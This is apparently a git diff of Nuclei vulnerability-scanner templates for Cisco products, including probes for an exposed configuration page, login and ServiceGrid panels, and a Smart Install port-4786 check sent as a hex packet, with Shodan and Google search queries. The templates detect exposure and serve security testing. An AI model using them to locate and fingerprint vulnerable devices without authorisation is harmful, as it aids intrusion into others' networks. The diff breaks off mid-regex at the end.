+++ b/nuclei-templates/Other/cisco-network-config-951.yaml
@@ -0,0 +1,25 @@
+id: cisco-network-config
+
+info:
+ name: Cisco System Network Configuration Exposure
+ author: DhiyaneshDk
+ severity: low
+ reference:
+ - https://www.exploit-db.com/ghdb/5430
+ tags: config,exposure,cisco
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/CGI/Java/Serviceability?adapter=device.statistics.configuration"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Network Configuration"
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/cisco-prime-infrastructure.yaml b/nuclei-templates/Other/cisco-prime-infrastructure-954.yaml
similarity index 100%
rename from nuclei-templates/Other/cisco-prime-infrastructure.yaml
rename to nuclei-templates/Other/cisco-prime-infrastructure-954.yaml
diff --git a/nuclei-templates/Other/cisco-secure-desktop-960.yaml b/nuclei-templates/Other/cisco-secure-desktop-962.yaml
similarity index 100%
rename from nuclei-templates/Other/cisco-secure-desktop-960.yaml
rename to nuclei-templates/Other/cisco-secure-desktop-962.yaml
diff --git a/nuclei-templates/Other/cisco-sendgrid-967.yaml b/nuclei-templates/Other/cisco-sendgrid-967.yaml
deleted file mode 100644
index d9708bf9f3..0000000000
--- a/nuclei-templates/Other/cisco-sendgrid-967.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: cisco-sendgrid
-
-info:
- name: Cisco ServiceGrid
- author: dhiyaneshDK
- severity: info
- reference: https://www.shodan.io/search?query=http.title%3A%22Cisco+ServiceGrid%22
- tags: panel,cisco
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/pages/sdcall/Login.jsp'
-
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - '(?m)^
Cisco ServiceGrid (.*)<\/title>$'
-
- - type: status
- status:
- - 200
-
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
- - 'Version ([0-9.]+)<\/div>'
diff --git a/nuclei-templates/Other/cisco-sendgrid-969.yaml b/nuclei-templates/Other/cisco-sendgrid-969.yaml
new file mode 100644
index 0000000000..7148f305d0
--- /dev/null
+++ b/nuclei-templates/Other/cisco-sendgrid-969.yaml
@@ -0,0 +1,31 @@
+id: cisco-sendgrid
+
+info:
+ name: Cisco ServiceGrid
+ author: dhiyaneshDK
+ severity: info
+ reference:
+ - https://www.shodan.io/search?query=http.title%3A%22Cisco+ServiceGrid%22
+ tags: panel,cisco
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/pages/sdcall/Login.jsp'
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - '(?m)^
Cisco ServiceGrid (.*)<\/title>$'
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - 'Version ([0-9.]+)<\/div>'
diff --git a/nuclei-templates/Other/cisco-smi-exposure-972.yaml b/nuclei-templates/Other/cisco-smi-exposure-972.yaml
deleted file mode 100644
index c5a6584dd8..0000000000
--- a/nuclei-templates/Other/cisco-smi-exposure-972.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: cisco-smi-exposure
-
-info:
- name: Cisco Smart Install Endpoints Exposure
- author: dwisiswant0
- severity: info
- description: Cisco Smart Install endpoints were discovered. Exposure of SMI to untrusted networks could allow complete compromise of the switch.
- reference:
- - https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html
- - https://blogs.cisco.com/security/cisco-psirt-mitigating-and-detecting-potential-abuse-of-cisco-smart-install-feature
- - https://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20170214-smi
- - https://github.com/Cisco-Talos/smi_check/blob/master/smi_check.py#L52-L53
- - https://github.com/Sab0tag3d/SIET
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
- cvss-score: 5.3
- cwe-id: CWE-200
- tags: network,cisco,smi,exposure
-
-network:
- - inputs:
- - data: "000000010000000100000004000000080000000100000000"
- type: hex
-
- host:
- - "{{Hostname}}"
- - "{{Host}}:4786"
-
- matchers:
- - type: word
- encoding: hex
- words:
- - "000000040000000000000003000000080000000100000000"
-
-# Enhanced by mp on 2022/03/30
diff --git a/nuclei-templates/Other/cisco-smi-exposure.yaml b/nuclei-templates/Other/cisco-smi-exposure.yaml
new file mode 100644
index 0000000000..212bbf0f1b
--- /dev/null
+++ b/nuclei-templates/Other/cisco-smi-exposure.yaml
@@ -0,0 +1,33 @@
+id: cisco-smi-exposure
+
+info:
+ name: Cisco Smart Install Endpoints Exposure
+ author: dwisiswant0
+ severity: info
+ description: |
+ This template attempts & supports the detection part only by
+ connecting to the specified Cisco Smart Install port and determines
+ if it speaks the Smart Install Protocol. Exposure of SMI to
+ untrusted networks can allow complete compromise of the switch.
+ reference:
+ - https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html
+ - https://blogs.cisco.com/security/cisco-psirt-mitigating-and-detecting-potential-abuse-of-cisco-smart-install-feature
+ - https://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20170214-smi
+ - https://github.com/Cisco-Talos/smi_check/blob/master/smi_check.py#L52-L53
+ - https://github.com/Sab0tag3d/SIET
+ tags: network,cisco,smi,exposure
+
+network:
+ - inputs:
+ - data: "000000010000000100000004000000080000000100000000"
+ type: hex
+
+ host:
+ - "{{Hostname}}"
+ - "{{Hostname}}:4786"
+
+ matchers:
+ - type: word
+ encoding: hex
+ words:
+ - "000000040000000000000003000000080000000100000000"
diff --git a/nuclei-templates/Other/cisco-systems-login-973.yaml b/nuclei-templates/Other/cisco-systems-login-973.yaml
new file mode 100644
index 0000000000..96ae7b9ee4
--- /dev/null
+++ b/nuclei-templates/Other/cisco-systems-login-973.yaml
@@ -0,0 +1,32 @@
+id: cisco-systems-login
+
+info:
+ name: Cisco Systems Login
+ author: dhiyaneshDk,idealphase
+ severity: info
+ metadata:
+ shodan-query: http.title:"Cisco Systems Login"
+ google-query: intitle:"Cisco Systems Login"
+ tags: panel,cisco
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Cisco Systems Login"
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ group: 1
+ regex:
+ - ' : DIR-850L